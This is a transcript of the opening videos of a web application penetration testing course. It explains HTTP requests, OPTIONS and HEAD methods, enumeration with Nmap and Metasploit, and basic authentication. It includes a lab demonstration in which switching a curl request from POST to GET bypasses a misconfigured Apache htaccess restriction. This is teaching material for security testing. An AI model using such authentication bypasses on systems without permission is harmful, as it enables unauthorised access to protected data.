Hello all, this is Vivek, and in this short video I'll be introducing the web application pen testing course which I'm about to start. So what do we plan to cover in this course? Now this course will begin right from the very basics and then move on to intermediate level topics and then eventually to advanced topics. And my idea, if you've pretty much seen any of my other courses, is to go really methodically and comprehensively and ensure that we really do not try to cut corners here and there. And that's the reason why my courses are going to be pretty much so big, right? 6, 9, 10, 12 hours. You must have seen a couple of them. And this course is going to be no exception. So I'm going to start from the very basics, right? Beginning with HTTP, HTTPS, protocol basics, and then move on to different web application architectures, have a look at the different tools of the trade, both client side as well as tools which you can run against a server like SQLmap and all of that. We will look at intercepting proxies because in web apps, pretty much that is your Swiss knife, right? How do you modify stuff before sending it to the web server, which probably the client, your browser, may not really allow? Or even how do you change things which the server sends back to you? Now, after I have assured that pretty much all of you guys have ramped up in using the different tools required to analyze web applications, we will move on to the actual vulnerabilities which are there in web apps, where we look at cross-site scripting, the different types, advanced cases, XSS filters and how to evade them, right? And tools like Beef, which pretty much, make you super powerful once you have discovered an XSS. From there, we'll move on to SQL injection, and we'll take up a bunch of examples, specifically the different types, how to figure out which type a specific case falls in, whether it's going to be error-based, blind, or even a second-order injection, and how to exploit those cases. Then we will move on to authentication, SSL management flaws, misconfigurations, not just on the web or database server, but also in the application frameworks, right? Then insecure direct object reference and CSRF, again a very important and typically misunderstood topic, where we will look at different variations of how CSRF attacks can happen in the real world. From there on, we'll move into clickjacking, insecure usage of cryptography, file upload vulnerabilities, where we'll take different combinations based on the filtration happening on the server side, whether it is the extension filtering or content type and a couple of other checks. Then RFI and LFI, different examples in that, and then web to shell, which is how do you use a web application vulnerability to finally get shell on the box. And in this specific part of the course, we'll also look at how to set up PHP Meterpreter and other important web shells which can make your life super easy once you've figured out how to upload and execute a script on the web server. Now from there on, we'll move on to more advanced topics, specifically Web 2.0 applications using Ajax, rich internet applications, which rely on Flash and Flex and many of these other frameworks. And then in today's world, I think no discussion is complete in web app security without talking about caching servers and non-relational databases. I pretty much never had any web app sec course talk about this, and I'm sure after we launch this, everyone will end up talking about this, right? Non-relational DBs are slowly becoming very important in the web application security space, right? Especially social media companies and large companies who are holding a huge amount of data pretty much rely on these databases. So we look at non-relational or non-RDBMS based DB attacks. From there on, we'll move on to HTML5 based attack vectors, which is again something which is quite new. And we'll look at a couple of variations of the different attacks which are available. And truth be told, this course and what I will be covering in this will keep evolving as I create more and more videos and put them online. Now, what is going to be the video schedule, right? So we are going to be doing at least 2 videos a week, which I'll be putting on pentesteracademy.com. And after the whole course is finished, we will end up offering this as a certification on securitytubetraining.com, right? We will also offer a lot of optional lab facilities, such as a SQL injection lab or an XSS lab, etc., while the course is running, which you can choose as a separate option if you like. But typically all the course, the videos, as well as any sample applications used are all included in this course, right? You needn't go anywhere else for that. So this is really what I had in mind for the introduction video. And I think you can subscribe at just $39 a month on Pentester Academy and pretty much get access to all our video series, including, of course, the web application pen testing one. Or you can check out Security Tube Training and see when we are going to launch web app pen testing as a full-blown certification. That's all, guys. Have fun. Bye-bye. Hello all. Welcome to the web application pen testing course. Now in this video, we'll look a little bit more in depth into HTTP methods and something called verb tampering. Now if you recall, in the HTTP header which we had seen in Wireshark, the very first thing was the request method, and we talked about one of the possibilities being get. So the question arises, what really are request methods? So very simply put, a request method is an operation which you can run on a resource on the web server. So we've looked at get, and get is typically only used for information retrieval. Though of course, a lot of people also use it to pass parameters and change things in databases and things like that. But typically it is just for information retrieval, which does not lead to any change in the backend. Then you have post, and post pretty much comes in when you have a lot more data to send. Let's say a file upload or maybe a form with many fields is pretty much what you would use. Post is pretty much what you would use with it, right? So in get, all the parameters get passed in the URL, while in post, it is in the message body. Now, pretty much get and post is what you would see probably for 99.99 recurring % of all the web traffic out there. However, there are other request methods also available in the HTTP standard. These include options, head, trace, put, delete, and a couple of others. Now, options is very interesting because for a given URI, options gives us the list of all supported methods, right? So this pretty much tells us what all the URI can support, get, post, maybe, put, delete, and things like that. Now, let's go ahead and look at a demonstration of options. So the problem with options is not every web server has it enabled anymore, right? So let me show you an example. So we use curl, you can say options, and we can pass it the URL, let's say, let's just probably take securitytube.net. And what you would see is that the output which we received was method not allowed. You can clearly see that, right? Which means the options method is not supported by the securitytube.net web server, which pretty much is the Google front-end web server, right? Rather than saying not supported, I'd pretty much say it's not allowed. Maybe they've configured the server in such a way that it may work for certain intranets and things like that. However, having said that, there are also servers which continue to allow options. Now, honestly, options is really just giving the attacker or the pen tester a list of all the allowed methods on the URI which we are mentioning, right? This at times, depending on what the web server may be offering, can lead to the attacker knowing different options it supports, and probably then he can launch further interesting attacks. And that's why I guess a lot of these servers have options turned off. Now, interestingly, while I was trying to find you an example, what I figured is that my own server, which is really, on shared hosting for vivekramachandran.com with DreamHost, had options turned on. And I'd like to insist, this isn't a security vulnerability, right? I mean, at best, I could probably call it a little bit of more information disclosure, right? And if you notice, in this case, we received a 200 OK, which is great. And the allowed options include get, head, post, or rather the allowed methods include get, head, post, and options itself. Fantastic, right? Now, if you're watching this video much later, please keep in mind that, maybe vivekramachandran.com may change, right? So don't blame me if you don't find it responding to options anymore. You can also play with Apache and all of that, and, maybe Nginx or JBoss and all of that, and see how to probably turn on all the request methods, right, in the config, so that you can locally simulate this in case you cannot readily find a host online. So now coming back, so options is good, allows us to enumerate all the different request methods which are supported by the web server for the given URI. Now, one of the other methods we talked about after that was head. Now, head is very interesting. It's pretty much telling the web server, give me the response if I had done a GET request for the same URI, but do not include anything in the message body. So all the web server does is the response is identical as it would for a GET request minus the message body, which means all the HTTP headers are the only thing which is pretty much included, right? So let me show you a demo of head. So I can actually go back here, and first let me issue a GET for vivekramachandran.com. And this is going to give us a lot of HTML, right? It's a really old website, probably one of the first I started a really long time back. I do not maintain it anymore. So if you find any little vulnerability, you could report it to me, so I don't know when I'd fix it. Okay, so what we see is 200 OK, and you have all of these little HTTP tags in there, or header values rather, and after that you have the entire HTML file. Now for the same URL, if we go ahead and issue a head, what you would find is that pretty much all we get is the HTTP response header as output, which is the entire thing here, and this is supposed to be identical as what would have been received if we had done a GET. And if you notice, after that we do not receive any message body, no HTML, no data in it, right? So this is the purpose of head. Now head unfortunately had some history of security risks, the first of which was actually authentication bypass. Now, unusually, it was actually possible in a lot of web server configs to specifically enforce authentication for certain request methods. So you could, for example, configure older versions of JBoss and tell it that, hey, if there is going to be a GET or a POST for the admin directory, ensure authentication happens and only authenticated users are allowed. Now, unfortunately, rather than the config interpreting this as only get and post are allowed, what the config ended up doing is that only for get and post, it went ahead and enabled authentication. And when you did head, it basically allowed you to bypass the authentication, right? So you guys have the slides for download just below the video. And here is a link from Fishnet Security on the JBoss JMX console auth bypass, which actually ended up using the head request to go ahead and bypass it. And really, I think the whole class of vulnerabilities which deals with the security risks and all of that of method tampering is what is called HTTP verb tampering. And I think the guys at Aspect Security came out with the very first detailed analysis. And as usual, I think Jeremiah Grossman has a very good read in his blog, which I've also linked to, about HTTP verb tampering and really the security risks and all that which comes with it. Honestly, in today's world, you may not find servers implementing head and allowing and all that a bit too much, because you can pretty much see this is dated back to 2008. But there are still old servers lying around, and you really don't know what you can encounter during a pen test. So this is a good thing to know about. We will also discuss the other method. Most important one probably is trace. And trace is interesting in the sense that it just echoes back the client's request back just to the client. And this is used, interestingly, in an attack called XST, which we will look at in a later video. And of course, after that, as I mentioned, put would go ahead and store the specific resource which you have in the URI, and delete can even delete it. Honestly, as dangerous as put and delete look like, in most cases, you would not find them enabled on production servers anymore. So it's super, super rare that you may end up finding put and delete being enabled, right? So hold on to trace. We're going to look at trace later on. At the end of this video, I'll leave you with a quick exercise. We had used curl in order to do the options and the head request and all of that. Now our best friends, right? I call them best friends because we use them so much. Nmap and Metasploit. Nmap has NSC scripts which can do verb tampering, and Metasploit has a module. So here is what I'd like to do as a little student exercise. Find the Nmap NSC scripts which are responsible, do the demo, and also find the Metasploit module and try it out as well. Now, if you go ahead and run this and you're feeling a little, enthusiastic, you could even shoot a short video of both these demos and post it on securitytube.net. And I'll have the admin team approve it, right? Just for fun. I mean, I don't need you to kind of do voice and all of that stuff. Just a quick demo. If you can, would be fantastic. If not, still great. Okay, guys, that's all for this video. Thank you very much. Bye-bye. Hello all. Welcome to the Web Application Pen Testing course. Now, we're going to start from the very basics, and I can understand that different viewers at this point would be in different stages of knowing about web application pen testing. So I'd probably request all of you to be a little patient, because I think the initial couple of videos for some of you would either be a good recap, or for the experts among you could even be trivial, right? So please be patient, and we'll get to all the more kind of fun stuff very, very soon. So having said that, let's start from the absolute basics, right? With what is the HTTP protocol? Now, HTTP stands for Hypertext Transfer Protocol, and really, I mean, very simply put, it's a client-server based architecture where you have a web server which is going ahead and serving what we call resources. These could be files or something else. And you have the client, which could be your browser or some other program which you're running. And the client requests resources to the server. And depending on if the server has the resource, the client has authorization, and a bunch of other things which we'll get into later, the server may serve the resource. Now, as you can clearly see, this is a very simple request response mechanism, right? The client requests for a resource and the server serves that resource. Now, the question is, how does one go about naming that resource, right? So in the world of HTTP, we identify resources with what are called URIs or URLs. So if typically most of you kind of remember, URL is pretty much the thing which we type in into the browser box on the top, such as http google.com or specific links to files, etc. And the browser knows how to reach that specific server and request for the resource. Now, HTTP as it exists today pretty much has two versions, 1.0 and 1.1. 1.1 is really the more prevalent one, or rather should be the more prevalent one. The key difference is that 1.1 can reuse the same connection and request multiple URIs, right? While in the case of 1.0, you would require one connection per resource and disconnect immediately. Now, how does all of this really work? So I've taken up a very simple example in which you have a web server, which of course would have a database server depending on the application logic, and you have a user who, using his browser, goes ahead and makes an HTTP request to the web server, maybe for the home page, a file, a movie, whatever he needs to see. Now, the question really arises, what happens in the background when this process goes on? Now, you know me, I hate slides beyond a point. So let's go ahead and dive into the details. Now, for this specific lag, I'm using Kali Linux as my platform. You could use Backtrack or anything else. The only requirement is that netcat, curl, and Wireshark be installed, which is installed by default on Kali and Backtrack, and that's really why I'm using it. If any of you guys would like a primer on Kali, Backtrack, or how to install it inside VirtualBox or Bare Metal, use the feedback link which is there as soon as you log in into Pentester Academy, and I'll probably make a video as well, right? So no question is too trivial, and sure, you let me know if you want a video on that. Okay, so we said HTTP requests is pretty much what drives the internet and the file fetching and all of that, right? So now let's look at how an HTTP request looks like at a very, very low level. So for that, we are going to go ahead and start Wireshark, which is a network sniffer. For students who've never used Wireshark, it basically allows you to analyze network traffic at a per packet level, right? So let's click on Wireshark. And I'm sorry I removed the whole cool black screen. Unfortunately, I want it to be easily readable by you guys. So I'm sorry about that. I hope I haven't offended at least many of you. So in Wireshark, let's go ahead, select the interface. I'm selecting ETH0. And my Kali is running on VirtualBox with NAT enabled by default. You could probably have it in bridged mode as well if you like. I'm going with NAT at this point. So let me go ahead, start the sniffing. And right now, as one can imagine, there is pretty much no traffic. So I'm going to go in here and let me go ahead and basically try and fetch the home page of securitytube.net. So one of the easier ways to do that is to use a program called curl, exceptionally useful and been around for ages. I'll use the verbose mode so I can pretty much see what is happening. And I'm going to type in securitytube.net, hit an enter. If you notice, I get a huge output in here. Let me scroll all the way up. And if you notice, I typed in curl -v www.securitytube.net. And curl after that goes ahead, tries to make the connection, And what does it send as soon as it succeeds in connecting to port 80, which is the default port for HTTP service? It sends this specific string here, right? Get slash HTTP 1.1 user agent blah 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 host securitystube.net except so on and so forth, right? Now to look at this in a structured way, what you would see next is we pretty much get a response from the server saying HTTP 1.1 200 OK. This is what we called HTTP response code. 200 is an example. 200 OK pretty much means what you requested for is available and here it is for you, right? And then after that, we have the whole HTML file which is being sent to us, which is present at the home page. Now let's shift back to Wireshark and really see what happened. Now the first thing we actually see is a set of ARP requests and responses, and this would happen depending on how your gateways etc. are configured. The next thing is DNS, of course, right? We go ahead and send a DNS query for www.securitystube.net. We get a response, and that's how we figure out the IP address. Now HTTP, even though it supports both TCP as well as UDP, pretty much I think 99.9 recurring websites only support or pretty much only use HTTP over TCP, right? There are cases where HTTP can be used with UDP as well, such as in the case of SSDP and all of that, but pretty much we won't bother about it because we are using whatever we are learning right now from a web application perspective, right? And in which case typically HTTP uses TCP in the underlying protocol. Now, if you notice, what is happening is the TCP, SYN, SYNAC, ACK, or the three-way handshake, as you can see, is going through. These are the first three packets. And after that, we see a packet which pretty much tells us that this is an HTTP GET request. Now, in the next video, I will get into what GET, POST, HEAD, and all of these things mean. But in a very simple explanation, for the time being, all of these are what are called request methods, right? So GET is the most common request method which is used, and this is really what we have initiated using curl. Now let me quickly look at the actual frame for the GET request. Now the first part, of course, is basically a small header which is prepended by Wireshark, which talks about when this frame was caught over the air, the size captured and stuff like that. The second is the Ethernet frame. Third part is the IP header. The fourth is the TCP header. And finally, above that, at the application layer, is the HTTP header. Let's go ahead and see what's there inside. And this pretty much mirrors what we saw here in our output. If you recall just moments back. So this is what we had seen. Get slash HTTP 1.1 blah blah blah. And this is really what is going here as well. Get slash. And this is nothing but pretty much gets the root document, or in most cases what we really call the home page. User agent, if you had used a browser, would have been Mozilla, Firefox, and a long string really, which talks about even the capabilities which the browser has to some extent. In this case, it basically says curl and the version of curl, because that's the user agent which curl internally uses. And then you have a host header which pretty much tells the web server what is the host name we are interested in with respect to the home page we are requesting, right? So many a times you can have multi-homed hosts as well, in which the same host or web server can go ahead and service multiple domains. And after that, you have a bunch of other header fields which aren't very interesting from a security perspective. And you see tons of them as we start using regular browsers, right? So this is how a simple HTTP request looks like. And you pretty much have, a lot of other packets belonging to the same request after that. Now, after the HTTP request goes through, the client goes ahead, the server gives back the response, and here is where the response is documented. If you see, it says 200 OK. And if I kind of go back in here and look at the response, this is what the server has sent back: content type, cache control, blah, blah, blah. The interesting header field here is server, which is Google front end, right? Interesting. That's because I'm running securitytube.net on Google App Engine, and I think they have their own customized servers. And after that, you finally have your line-based text data, which is nothing but the HTML page itself, right? Okay, awesome. Now let's go ahead and try and do this whole thing manually. And that is what we are going to see in the next video, where we quickly try and do this with Netcat and try and understand some small things about HTTP 1.1 versus HTTP 1.0. So that's all for this video, guys. Thank you. Hello all. Welcome to the Web Application Pen Testing course. Now, in the previous video, I had told you to investigate the different NSC scripts available in Nmap and the modules in Metasploit which may allow you to do HTTP method-based testing. Now, let me give you some quick hints on how to solve this exercise. Now, in Metasploit, you have a module by the name of options under auxiliary scanner HTTP, using which you can enumerate the HTTP options available on a remote system. So here you go, we do use auxiliary scanner HTTP options, do a quick show options, and the only thing which we need to fill up is our hosts, which I've already done. And this is a local IP which has HTTP options enabled on the web server. And after that, let's just hit run. Simple as that. And if you notice, it basically says 1.11 allows post, options, get, and head. So this is how you can quickly enumerate the options available on a remote server, of course, if it allows for that, using Metasploit, right? You could always go through the curl technique, but I guess a lot of people are used to doing it with Metasploit. Now, if you wanted to do this real quick using Nmap, then we have an NSC script called http-methods. So the best way to investigate Nmap NSC scripts is the documentation on their website. And here it is, HTTP methods. So this allows you to go ahead and look at the methods available if the HTTP server is supporting the options request, right? Super simple. So let's go back in here. The options, as I've mentioned on the slides, are really easy. -- script, http methods.nsc, give the IP address. So we have nmap -- script. And honestly, if you have never seen how to figure out the scripts available, you can actually go to user share nmap, and this is Kali, by the way. Backtrack definitely has a different location. Scripts, and you have all the NSC scripts in here. The one we are interested in is the HTTP, which also are, there are probably a ton of them, which is a good thing. We have a ton of options to play around with. And here is the one which we are interested in, HTTP methods, as you can see that, which is what we're going to use, right? So in case you have no clue about which scripts are available, this is how you'd probably do it. And we also give two additional options, -n and -p80, so that Nmap does not waste time, right? Script is equals HTTP methods, and you can see the name in case you've forgotten. .nsc, give the IP address 1.11 -n-p 80, and here we go. And if you notice, currently it says the different ports are filtered. I'll just quickly check if the service is up and running. I have this on another machine, so looks like the service is running. Doesn't seem to be any problem with that. Try this again. And if you notice this time around, I mean, without me really changing anything, and honest to God, I mean, I haven't changed anything in here. Nmap basically tells me that the following methods are enabled: post, options, get, and head, right? So it looks like the NSC script is a bit buggy because the first time it did not run without me really having done any changes. It seems to run the very next time, right? Okay, so this is how you would enumerate the different options available in case you had the options method available, right? Now, this same NSC script has an interesting option which says http methods.retest, and what this really does is for each of those methods, it goes ahead and does a test individually to check if they're available. So we can actually do script args in here. So you can go back in here and say -- script args equals, and you can copy this from here, http methods.retest. http methods.retest, and if you notice over here, you can say if defined, it would go ahead and basically try each of these options by itself. Just a second. Right, so what we're going to do right now is basically set this to 1. It's now equal to required in here, and this time around it goes ahead and checks for each of these methods which it received in the HTTP method scan. Right, this is good, and as they really warn, if probably there are methods like delete in there which can work, then this could really be something which is not safe, because we would end up doing a delete method on the root directory. So keep this in mind, is that once you do the retest, it isn't safe anymore if things like put and delete and all of those are available, right? Awesome. So this is how you can enumerate the methods. And if you wanted to do verb tampering, again, Metasploit and Nmap both have options. If you find a vulnerable server, one of them is verb auth bypass for Metasploit, and in the case of Nmap, it is HTTP method tamper. So have a look at these later on. But the good news is both Metasploit and Nmap have the different modules available for testing different HTTP methods. That's all for this video, guys. Thank you. Hello all, welcome to the web application pen testing course. Now we've talking a lot about HTTP verb tampering, and unfortunately I think because most of the web servers aren't vulnerable anymore, it was pretty difficult, to find a demo. So what I've done is I've created a demo, just because a majority of web servers, aren't vulnerable anymore doesn't mean, you would never find one. I think even in enterprises where you may have a lot of legacy equipment and networks sitting inside, you could probably end up finding such vulnerabilities. Now, the other interesting thing is because HTTP verb tampering typically ends up happening because of misconfiguration, there is a high likelihood that some admin would end up doing this mistake. So really, I do not see this going away, entirely, probably for a long time. Okay, So what I've done is I've created a demo application, and here it is. It says Pentester Academy, enter at your own risk, which you guys have, right? You already subscribed. And let me go ahead and click on submit so that we can enter. And unfortunately, it seems to ask us for a basic auth. So let's say yes, yes, isn't working. Vivek ABCD isn't working, right? And if I do a cancel, unfortunately, I get an authorization required prompt. Not too good, right? And this is something which I think a lot of us commonly encounter. Now, a lot of things may be happening in the background when you get an authorization required prompt, which means you don't have a set of auth credentials. Now, one of the possible ways this can happen is because of an HT access file, of course. And in that, really, the web admin has gone ahead and put out certain restrictions, probably for valid users or a specific group of users, you really don't know. But for VERP tampering to go ahead and become applicable, he would have gone ahead and limited access also based on the request method. Now, if you notice, that is typically done using the limit keyword in an Apache HT access file. Now, what this is saying is limit access to this resource only via post for valid users. Unfortunately, what this also means is that any other request method would end up becoming valid and does not require any form of authentication, right? And this misconfiguration is what leads to HTTP VERP tampering, okay? So now let's go back in here, and here is what I'm going to do. I'm going to go back and make a request via curl. And let me try and make a post request. Let me check really if we require any form of post variables to be sent in. So I can do a quick view page source, and looks like there are no other post variables. All it does is basically takes us directly inside the secret folder, right? So let me go back in here, just say I want to do this as a post. And let me mention the URL 192.168.1.11/secret, right? This is what we could gather based on what we've seen right now. So let me run this. And clearly, as expected, we see authorization required, right? This is the error which we're also getting, or the prompt rather, which we are getting when we use the web browser. Now I've already SSH'd into 192.168.11, and as I showed you on the slides, this is how the HT access file looks like. Now unfortunately, rather than limiting /secret based on just users and not specifying any specific HTTP method, this admin has decided to use the limit keyword along with the HTTP method post. So unfortunately, what this really means is if we go back in here and just change the access method to a get, right? Woot, right? We go ahead and now get index of secret, and this time seems to be we get a 200 OK, which is really, really shocking, right? Because just by changing the request method, we have been able to authenticate to the web server, right? And honestly, I mean, pretty much when we did the submit query and we did the cancel, to access this resource, all we had to do is just hit an enter on the browser, simply because that would simulate a GET request. And there you go, right? You can see the secret and the other files which are in there. So this is a very simple example of HTTP VERP tampering, and this specific HT access file and all of this Do not worry, I'm going to probably go ahead and put it out there in the next video. All I'm trying to figure out is how to package this in a way so that you can download and get started rather than having to do all the installation and copying the files and all of that. So I'm trying to build a really small VM, and if you're watching this video maybe a couple of weeks later or even days later, you should find that, right? Find it available for download. That's all for this video, guys. Thank you. See you in the next one. Bye-bye. Hello all. In the last video, I showed you a simple example of verb tampering. Now I promised you that I would manage to package all of that and provide it as a lab exercise. This is really what this video is going to be about. You can click on the download button down below and download the VM. Now, you would need VirtualBox with the extension pack in order to be able to run the VM, and it's in the open virtualization format, so you can just import it inside VirtualBox, and I'll just show you in a bit how to. Now, you're probably thinking there has been something wrong with your download, because is the VM only 22 MB, right? Apache and all of that kind of packed in. And to be honest, guys, the reason it took me one additional day is because I did not want to package everything in Ubuntu server and give you a 400, 500 MB download, right? It's not scalable as well, simply because, you know, for every single lab exercise, I would have to end up either updating a VM and pushing it up into the cloud for you to download, or to upload individual VMs, each of which could be a staggering, you know, 400 to 600 MB. So I did a bit of research, and I think a lot of people recommended that I try out TinyCore Linux on Facebook and other places, and I tried it out. It's a very interesting distribution, and where you'll probably have to run through the docs to understand how to make part of the file system persistent. But the end conclusion was I was able to go ahead and package everything in within 22 MB with a full-blown GUI. And this is really what we're going to use in this exercise. Now, while importing the VM, there may be some small issues at times. I'm going to import it here, especially when you put the networking to bridged mode and you basically try to install the same VM on another machine with VirtualBox. There's a link to a video which I just shot and put it up on YouTube, which you can see as well. Okay, now let me do the demo. Please download the VM from the link given below. And I've already downloaded it. And my setup is really Kali Linux, which is already running. And now let me actually import the VM in. So I'm going to hit File, Import Appliance, Open Appliance, Desktop, and I'm selecting the OWA file. Continue. You can change the name if you like. Verb tampering, just so that you know what VM is for what. And as tiny as it is, it probably takes like a second to import. Now, the important thing to remember is to set the network settings right. So click on that and ensure that if bridge mode is selected, you have the right adapter through which you would want bridging to be done. Now, the VM is set to do DHCP automatically, and in my network, I have a DHCP server on the LAN. So, go ahead and change this setting depending on how your network is configured, right? You could even give a static IP after booting the VM. Click OK. Let's hit start. And there you go. Yes, it's really booted already. I know it's unbelievable, but your system is all ready now. Now all one would have to do is kind of go in, click System Tools, Terminal, and because I'm running DHCP, quickly look at the IP address. It basically tells me that my IP address is 1.8 on the LAN network, and my Kali machine can reach that IP address as well. So let me go back to the Kali machine. Here I am. So after you found the IP address, we can pretty much go and try out the demonstration. The Apache server is turned on by default. So let me go in here. 192.168.1.8 is the IP which we found out. And here goes, right? Pentester Academy, enter at your own risk. Now, the Pentester Academy image is loading from our servers. So, if you have another network configuration where the VM does not have direct internet access, then you wouldn't see the logo loading in, right? Now we click on submit, and as expected, we are confronted with the auth required. We do not know the authorization, fails. And as we've seen in the previous video, this basically means that now we could try for other things, one of which may be because of misconfiguration in the Apache htaccess file itself, right? And the misconfiguration which we discussed is that we are restricting the authentication only when we are querying for that resource using the post method, which means if we use a get method, it would work perfectly. So we can go back in here, and I could just use curl, first do a post, we need to figure out the directory. If you notice, it's /secret. And when we run this, we get our auth required. And as we've seen before, when we change this to get, we no longer require the auth. And I can verify this by going back in here, hitting an enter, and ooh, credit card details. My credit card is in there. So that's all for this demonstration. If you're using Windows and you have any sort of issues in importing the VM, I've created the short video which I kind of gave a link to down here, the YouTube one. Have a look at this, and you should probably be able to go up and running in a matter of seconds, right? So use the feedback tab which is there in your account login. That's when you click member access, where you can see your logs and recent updates and all of that. And tell me if things worked out with this VM in specific, right? Because I've kind of just made it, so your feedback is very, very valuable. Right, guys? And I'm going to see you in the next video. Bye-bye. Hello all. Welcome to the Web Application Pen Testing course. And in this video, we'll do a quick lab with Netcat on how to connect to a web server and then go ahead and request the home page using HTTP 1.0 and 1.1 protocols, and also try and understand the most basic difference. So let's move on directly to the demo. There aren't any slides for this video. So let's go ahead and use Netcat, which is really a kind of Swiss Army knife replacement for Telnet. And let's connect to securitytube.net on port number 80. And you have my full permission to do so. And then let's issue a simple GET request. And we'll basically go ahead and use the HTTP 1.0 protocol. right? And if you notice, we basically ended up getting the whole HTML page as expected, and the server disconnected us. So that's a ton of HTML content. Let me kind of quickly scroll up. There we go, right? So this was the HTTP request which we did. So we typed in get slash HTTP slash 1.0, and then we mentioned the host to be www.securitytube.net. Now, the 1.0 protocol, from what I remember, does not mandate the host header. However, in the case of 1.1, the host header is mandatory. Now, get is what we call a request method, and we look at request methods in more detail in the next video. However, very simply put, get slash HTTP 1.0 tells the web server that we want to fetch the home page for the website securitytube.net, or rather www.securitytube.net, and to use the HTTP 1.0 protocol to do so. The server responds back with, the whole 200 OK, a couple of other header fields. So each of these lines is a header field: content type, cache control, vary, date, server, so on and so forth. And then the actual response body, which contains the HTML file. Now, the clear difference we will see while working with 1.1 will be apparent in just a second. So again, let me issue the web request, but this time for 1.1. And here we go. If you notice, we were not disconnected, right? We are still connected. And the interesting part is I can again go back and issue another request. Doesn't necessarily have to be for the same page. Of course, at times a lot of servers end up timing you out, so keep that in mind. So, I think I made a mistake. So if you notice, it says bad request, but notice it still kept me connected. So let me try and do the request right this time. This is what happens when you switch too many computers and the keyboards differ. And if you notice, we were again served the HTML page. And I could serve request for something else. So let's say get slash video. I don't think this URL exists, so probably should get an error. And if it says 404 not found, but note we are on the same TCP connection, and this is the critical difference between 1.0 and 1.1. 1.0 does not allow you more than one resource request, while in 1.1 you're allowed to ask for multiple resources in the same TCP connection. Right? And pretty much what you should have done is used connection close along with a request. So let me go back in here and let me actually clear the screen rather. And if I do the following, get slash HTTP 1.1, put the host header in www.securitytube.net, and then say connection close. Right, the web page is returned, but this time the connection gets automatically closed. And this is probably, in my view, one of the most important differences. 1.1 allows you to pipeline HTTP requests in which you can, pretty much like pump in multiple resource requests, and the server would go ahead and, service each of them. However, in the same TCP connection, right? So this would mean that a server can maintain a TCP connection for a much longer time in the case of HTTP 1.1. Now, the last thing I'd like to mention is if you went ahead and tried to do the same thing using a web browser, So let's open up the web browser on Kali. You would see something, slightly different, in the sense the web browser would just go ahead and issue multiple simultaneous requests at a very fast pace. So let's say we go back to Wireshark, we start sniffing, go back here, and I type in securititube.net. And what you would notice is that your web browser actually starts making a ton of requests. We can even type in a little filter in here. So let's say http dot request, and then from there on you can pretty much go further as well. If you notice, it gives you some hints. You can say method equals get. Now if you look at the output in Wireshark, you will see that the browser automatically is doing requests for a ton of resources. Really, here is what is happening. The browser fetches the home page, parses that HTML, and whenever it sees a reference to some other file like a JavaScript file or a style sheet, it'll immediately go ahead and start fetching them as well. So you can see all the JavaScripts here, and just after that we also see all the CSSs and other small things, the skin files and all of that being requested. Right? Fantastic. So the key thing which we have learned in the last two videos is how the HTTP protocol basically functions, request response, the difference between 1.1 and 1.0, rather the most important difference, and the fact that you are pretty much allowed to do all of this manually as well, simply because HTTP is a text-based protocol at the very end. So if you ever typed in your own fake email using SMTP, you can pretty much go ahead and frame your own HTTP requests also using netcat or curl, and later on, as we will see, even modify more interesting ones using browser plugins and proxies. That's all for this video. In the next one, we will look at HTTP methods and try and understand security issues about a couple of them. Thank you very much. All, welcome to the web application pen testing class on Pentester Academy. Now in this video, we will talk about HTTP basic authentication. Now before we move on, I'd like to first visit HTTP response codes. Now in the previous video, we looked at how you can make HTTP requests using various methods like get, put, head, post, etc. Now for any request which you make, the server responds back with a response code and any response body such as an HTML file or probably a redirect or whatever it might be with it. So briefly, if I were to summarize, any response code in the range 1xx is informational, 2xx is really request successful. As an example, the 200 OK, which we have seen a lot of times. In the 3xx region is typically redirects. So if you notice, if you've done any of the web application challenges, you may have seen the 302 moved temporarily redirect. In the 4xx range, what it means is typically the client has done some error in the request. As an example, in HTTP basic authentication, you will see there is a 401 unauthorized, which is you're unauthorized to access this resource and you're not providing credentials as required. And finally, 5xx, which is error on the server side. Probably you sent an input the server could not process, or at times if there is poor error handling on the server side, let's say a database connectivity code fails and the developer does not handle that exception correctly, then there could be an unhandled exception which could lead to a 500 server error. Okay, so now let's move on to authentication in HTTP. Now, purely at the HTTP protocol level, there are only two kinds of authentication supported. The first is basic authentication and the other is digest authentication. Now, it's important to note that other kinds of auth such as forum based, or Windows based authentication or OpenID and things like that uh, are not part of the HTTP standard, right? These are all stuff which has been built on top of application frameworks and things like that. So to keep it very, very simple, HTTP authentication is only basic and digest. Now, in this video, let's explore how basic authentication works. It's really very simple. The client in step one requests for a protected resource, let's say /admin or /secret or /members, and the server goes ahead and makes a request for username and password. So the server tells you this is a protected resource and you need to provide credentials in order to be able to access it. Now the client sends the username password, and if this matches what the server has in its database, you are granted access to that resource. If not, typically in the case of HTTP basic auth, it would just reprompt you once again for a valid username and password. I think many of you may have encountered this little box which says auth required, which typically how basic authentication looks like. Now, let's try and understand basic auth in a little more in-depth way by using Wireshark. Now, the application I will use is a challenge application which I have posted in the web applications challenges section, going by the title HTTP basic authentication attack level easy. So let me go into my backtrack machine, and this is how the auth page looks like. And if we go ahead and try to click enter Pentester Academy, we are prompted for an authentication, and it basically says Pain Games 1.0. And if you enter something such as Nick admin, if it is probably not the right credentials, you would just be prompted for it once again, right? And a lot of clients may just eventually kind of time out and show you the unauthorized page. This unauthorized page is customizable by the developer, so you may see different kinds of pages. This is not really one set looking page. Now, how does this work internally, right? So let me give you an example. Let's go ahead and open up Wireshark so that we can actually see the network traffic and understand basic authentication at a very low level. So let's wait for Wireshark to open. And I'm going to select ETH0 or whichever network interface you may be using. I'm going to go ahead and start sniffing. And I'm going to type in a filter for HTTP. Go back to Pentester Academy. I'm going to click on enter Pentester Academy. I get the prompt. Let's say I type in Vivek and let's say Pentester Academy. Hit an enter, get back the same prompt, which is absolutely fine. And if you notice here, we can clearly see our basic auth process starting. So we go ahead and we seem to make a request for this specific resource, and the server seems to be responding back with a request for basic authentication. And this is done by adding a new HTTP header called www-authenticate. And in that, it tells us this is basic authentication and the realm is Pain Games 1.0. The realm is customizable by the web admin or by the application developer, right? Now, when our browser receives this, that is when it shows you the little prompt. And if you notice, the response code is 401 unauthorized, right? And that tells the browser that really, the response basically is guiding it to request for a username and password, which it needs to send over a basic authentication protocol. Now the client responds back, and of course this response is what we've responded. And the response goes back in the authorization header, which says authorization, this is basic. And then you have a string which looks pretty random, right? Where did Vivek and Pentester Academy disappear? Now this string is actually derived from Vivek and Pentester Academy, which are the credentials, separated by a colon, right? And this string has been base 64 encoded. Now, if you've never ever heard of base 64 encoding, the best place to go really is Wikipedia. And in very simple terms, as they've already written, it's a simple binary to text encoding schema, which uses a table to convert 3 octets into 4 encoded characters using this specific table. And there are conditions for padding and stuff like that as well, right? You can go ahead and 